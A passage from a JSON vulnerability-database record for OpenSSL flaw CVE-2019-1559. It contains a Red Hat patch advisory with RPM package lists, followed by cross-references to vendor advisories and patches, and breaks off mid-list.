Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* openssl: 0-byte record padding oracle (CVE-2019-1559)\n\n* openssl: timing side channel attack in the DSA signature algorithm\n(CVE-2018-0734)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm\n1649568 - openssl: microarchitectural and timing side channel padding oracle attack against RSA\n1683804 - CVE-2019-1559 openssl: 0-byte record padding oracle\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nppc64:\nopenssl-1.0.2k-19.el7.ppc64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc64.rpm\nopenssl-devel-1.0.2k-19.el7.ppc.rpm\nopenssl-devel-1.0.2k-19.el7.ppc64.rpm\nopenssl-libs-1.0.2k-19.el7.ppc.rpm\nopenssl-libs-1.0.2k-19.el7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.2k-19.el7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm\nopenssl-devel-1.0.2k-19.el7.ppc64le.rpm\nopenssl-libs-1.0.2k-19.el7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-19.el7.s390x.rpm\nopenssl-debuginfo-1.0.2k-19.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-19.el7.s390x.rpm\nopenssl-devel-1.0.2k-19.el7.s390.rpm\nopenssl-devel-1.0.2k-19.el7.s390x.rpm\nopenssl-libs-1.0.2k-19.el7.s390.rpm\nopenssl-libs-1.0.2k-19.el7.s390x.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.2k-19.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc64.rpm\nopenssl-perl-1.0.2k-19.el7.ppc64.rpm\nopenssl-static-1.0.2k-19.el7.ppc.rpm\nopenssl-static-1.0.2k-19.el7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm\nopenssl-perl-1.0.2k-19.el7.ppc64le.rpm\nopenssl-static-1.0.2k-19.el7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-19.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-19.el7.s390x.rpm\nopenssl-perl-1.0.2k-19.el7.s390x.rpm\nopenssl-static-1.0.2k-19.el7.s390.rpm\nopenssl-static-1.0.2k-19.el7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-0734\nhttps://access.redhat.com/security/cve/CVE-2019-1559\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXUl3otzjgjWX9erEAQgZQQ//XNcjRJGLVmjAzbVGiwxEqfFUvDVNiu97\nfW0vLXuV9TnQTveOVqOAWmmMv2iShkVIRPDvzlOfUsYrrDEYHKr0N38R/fhDEZsM\nWQrJh54WK9IjEGNevLTCePKMhVuII1WnHrLDwZ6hxYGdcap/sJrf+N428b5LvHbM\nB39vWl3vqJYXoiI5dmIYL8ko2SfLms5Cg+dR0hLrNohf9gK2La+jhWb/j2xw6X6q\n/LXw5+hi/G+USbnNFfjt9G0fNjMMZRX2bukUvY6UWJRYTOXpIUOFqqp5w9zgM7tZ\nuX7TMTC9xe6te4mBCAFDdt+kYYLYSHfSkFlFq+S7V0MY8DmnIzqBJE4lJIDTVp9F\nJbrMIPs9G5jdnzPUKZw/gH9WLgka8Q8AYI+KA2xSxFX9VZ20Z+EDDC9/4uwj3i0A\ngLeIB68OwD70jn4sjuQqizr7TCviQhTUoKVd/mTBAxSEFZLcE8Sy/BEYxLPm81z0\nveL16l6pmfg9uLac4V576ImfYNWlBEnJspA5E9K5CqQRPuZpCQFov7/D17Qm8v/x\nIcVKUaXiGquBwzHmIsD5lTCpl7CrGoU1PfNJ6Y/4xrVFOh1DLA4y6nnfysyO9eZx\nzBfuYS2VmfIq/tp1CjagI/DmJC4ezXeE4Phq9jm0EBASXtnLzVmc5j7kkqWjCcfm\nBtpJTAdr1kE=7kKR\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-1559"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      },
      {
        "db": "VULHUB",
        "id": "VHN-147651"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1559"
      },
      {
        "db": "PACKETSTORM",
        "id": "169635"
      },
      {
        "db": "PACKETSTORM",
        "id": "154009"
      },
      {
        "db": "PACKETSTORM",
        "id": "151918"
      },
      {
        "db": "PACKETSTORM",
        "id": "158377"
      },
      {
        "db": "PACKETSTORM",
        "id": "152084"
      },
      {
        "db": "PACKETSTORM",
        "id": "155413"
      },
      {
        "db": "PACKETSTORM",
        "id": "151885"
      },
      {
        "db": "PACKETSTORM",
        "id": "153932"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-1559",
        "trust": 3.4
      },
      {
        "db": "TENABLE",
        "id": "TNS-2019-03",
        "trust": 1.8
      },
      {
        "db": "TENABLE",
        "id": "TNS-2019-02",
        "trust": 1.8
      },
      {
        "db": "MCAFEE",
        "id": "SB10282",
        "trust": 1.8
      },
      {
        "db": "BID",
        "id": "107174",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "151886",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "158377",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155415",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4479.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3729",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0102",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2383",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3462",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0487",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4083",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0620",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0751.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4558",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0192",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4479",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0032",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4255",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4297",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0666",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4405",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3390.4",
        "trust": 0.6
      },
      {
        "db": "PULSESECURE",
        "id": "SA44019",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "151885",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "151918",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154042",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-147651",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1559",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169635",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154009",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "152084",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155413",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153932",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147651"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1559"
      },
      {
        "db": "PACKETSTORM",
        "id": "169635"
      },
      {
        "db": "PACKETSTORM",
        "id": "154009"
      },
      {
        "db": "PACKETSTORM",
        "id": "151918"
      },
      {
        "db": "PACKETSTORM",
        "id": "158377"
      },
      {
        "db": "PACKETSTORM",
        "id": "152084"
      },
      {
        "db": "PACKETSTORM",
        "id": "155413"
      },
      {
        "db": "PACKETSTORM",
        "id": "151885"
      },
      {
        "db": "PACKETSTORM",
        "id": "153932"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1559"
      }
    ]
  },
  "id": "VAR-201902-0192",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147651"
      }
    ],
    "trust": 0.3990740766666666
  },
  "last_update_date": "2026-04-10T22:22:06.256000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "hitachi-sec-2019-132 Software product security information",
        "trust": 0.8,
        "url": "https://usn.ubuntu.com/3899-1/"
      },
      {
        "title": "OpenSSL Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89673"
      },
      {
        "title": "Red Hat: Moderate: openssl security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192304 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192471 - Security Advisory"
      },
      {
        "title": "Ubuntu Security Notice: openssl, openssl1.0 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3899-1"
      },
      {
        "title": "Debian Security Advisories: DSA-4400-1 openssl1.0 -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=675a6469b3fad3c9a56addc922ae8d9d"
      },
      {
        "title": "Red Hat: Moderate: rhvm-appliance security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192439 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.2 security release",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20193929 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.2 security release",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20193931 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat Virtualization security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192437 - Security Advisory"
      },
      {
        "title": "Red Hat: CVE-2019-1559",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2019-1559"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201903-2] openssl-1.0: information disclosure",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201903-2"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201903-6] lib32-openssl-1.0: information disclosure",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201903-6"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2019-1559"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2019-1188",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2019-1188"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2019-1362",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2019-1362"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2019-1188",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2019-1188"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Spectrum Protect Backup-Archive Client NetApp Services (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=884ffe1be805ead0a804f06f7c14072c"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Security Proventia Network Active Bypass is affected by openssl vulnerabilities (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1092f7b64100b0110232688947fb97ed"
      },
      {
        "title": "IBM: IBM Security Bulletin: Guardium StealthBits Integration is affected by an OpenSSL vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=6b4ff04f16b62df96980d37251dc9ae0"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM InfoSphere Master Data Management Standard and Advanced Editions are affected by vulnerabilities in OpenSSL (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7856a174f729c96cf2ba970cfef5f604"
      },
      {
        "title": "IBM: IBM Security Bulletin: OpenSSL vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=04a72ac59f1cc3a5b02c155d941c5cfd"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM DataPower Gateway is affected by a padding oracle vulnerability (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9c55c211aa2410823d4d568143afa117"
      },
      {
        "title": "IBM: Security Bulletin: OpenSSL vulnerabilites impacting Aspera High-Speed Transfer Server, Aspera Desktop Client 3.9.1 and earlier (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c233af3070d7248dcbafadb6b367e2a1"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by openssl vulnerabilities (CVE-2019-1559, CVE-2018-0734)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7ceb7cf440b088f91358d1c597d5a414"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Rational ClearCase (CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c0b11f80d1ecd798a97f3bda2b68f830"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerability CVE-2019-1559 in OpenSSL affects IBM i",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=12860155d0bf31ea6e2e3ffcef7ea7e0"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2019-1559) Security Bulletin",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2709308a62e1e2fafc2e4989ef440aa3"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Vulnerabilities in OpenSSL affect IBM Worklight and IBM MobileFirst Platform Foundation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1b873a45dce8bb56ff011908a9402b67"
      },
      {
        "title": "IBM: IBM Security Bulletin: Node.js as used in IBM QRadar Packet Capture is vulnerable to the following CVE\u2019s (CVE-2019-1559, CVE-2019-5737, CVE-2019-5739)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=aae1f2192c5cf9375ed61f7a27d08f64"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities affect IBM Cloud Private (CVE-2019-5739 CVE-2019-5737 CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8b00742d4b57e0eaab4fd3f9a2125634"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerabilities in OpenSSL affect GCM16 \u0026 GCM32 and LCM8 \u0026 LCM16 KVM Switch Firmware (CVE-2018-0732 CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ca67e77b9edd2ad304d2f2da1853223f"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerabilities in GNU OpenSSL (1.0.2 series) affect IBM Netezza Analytics",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ac5ccbde4e4ddbcabd10cacf82487a11"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerabities in SSL in IBM DataPower Gateway",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=5fc1433ca504461e3bbb1d30e408592c"
      },
      {
        "title": "Hitachi Security Advisories: Vulnerability in Cosminexus HTTP Server",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2019-112"
      },
      {
        "title": "Hitachi Security Advisories: Vulnerability in JP1",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2019-132"
      },
      {
        "title": "IBM: IBM Security Bulletin: Security vulnerabilities identified in OpenSSL affect Rational Build Forge (CVE-2018-0734, CVE-2018-5407 and CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e59d7f075c856823d6f7370dea35e662"
      },
      {
        "title": "Debian CVElist Bug Report Logs: mysql-5.7: Security fixes from the April 2019 CPU",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5f1bd0287d0770973261ab8500c6982b"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerability in Node.js affects IBM Integration Bus \u0026 IBM App Connect Enterprise V11",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1a7cb34592ef045ece1d2b32c150f2a2"
      },
      {
        "title": "IBM: IBM Security Bulletin: Secure Gateway is affected by multiple vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=28830011b173eee360fbb2a55c68c9d3"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities affect IBM\u00ae SDK for Node.js\u2122 in IBM Cloud",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8db7a9036f52f1664d12ac73d7a3506f"
      },
      {
        "title": "IBM: IBM Security Bulletin: Security vulnerabilities in IBM SDK for Node.js might affect the configuration editor used by IBM Business Automation Workflow and IBM Business Process Manager (BPM)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=6b74f45222d8029af7ffef49314f6056"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2019",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=4ee609eeae78bbbd0d0c827f33a7f87f"
      },
      {
        "title": "Tenable Security Advisories: [R1] Nessus Agent 7.4.0 Fixes One Third-party Vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2019-03"
      },
      {
        "title": "Forcepoint Security Advisories: CVE-2018-0734 and CVE-2019-1559 (OpenSSL)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=b508c983da563a8786bf80c360afb887"
      },
      {
        "title": "Hitachi Security Advisories: Multiple Vulnerabilities in JP1/Automatic Job Management System 3 - Web Operation Assistant",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-121"
      },
      {
        "title": "Palo Alto Networks Security Advisory: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=217c2f4028735d91500e325e8ba1cbba"
      },
      {
        "title": "Palo Alto Networks Security Advisory: CVE-2019-1559 OpenSSL vulnerability CVE-2019-1559 has been resolved in PAN-OS",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=a16107c1f899993837417057168db200"
      },
      {
        "title": "IBM: IBM Security Bulletin:IBM Security Identity Adapters has released a fix in response to the OpenSSL vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=00b8bc7d11e5484e8721f3f62ec2ce87"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerabilities have been identified in OpenSSL and the Kernel shipped with the DS8000 Hardware Management Console (HMC)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=423d1da688755122eb2591196e4cc160"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities affect IBM Watson Assistant for IBM Cloud Pak for Data",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1e6142e07a3e9637110bdfa17e331459"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Vulnerabilities in Watson Openscale (Liberty, Java, node.js)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=a47e10150b300f15d2fd55b9cdaed12d"
      },
      {
        "title": "Tenable Security Advisories: [R1] Nessus 8.3.0 Fixes Multiple Third-party Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2019-02"
      },
      {
        "title": "IBM: IBM Security Bulletin: BigFix Platform 9.5.x / 9.2.x affected by multiple vulnerabilities (CVE-2018-16839, CVE-2018-16842, CVE-2018-16840, CVE-2019-3823, CVE-2019-3822, CVE-2018-16890, CVE-2019-4011, CVE-2018-2005, CVE-2019-4058, CVE-2019-1559)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0b05dc856c1be71db871bcea94f6fa8d"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Releases 1801-w and 1801-y",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bf3f2299a8658b7cd3984c40e7060666"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/Live-Hack-CVE/CVE-2019-1559 "
      },
      {
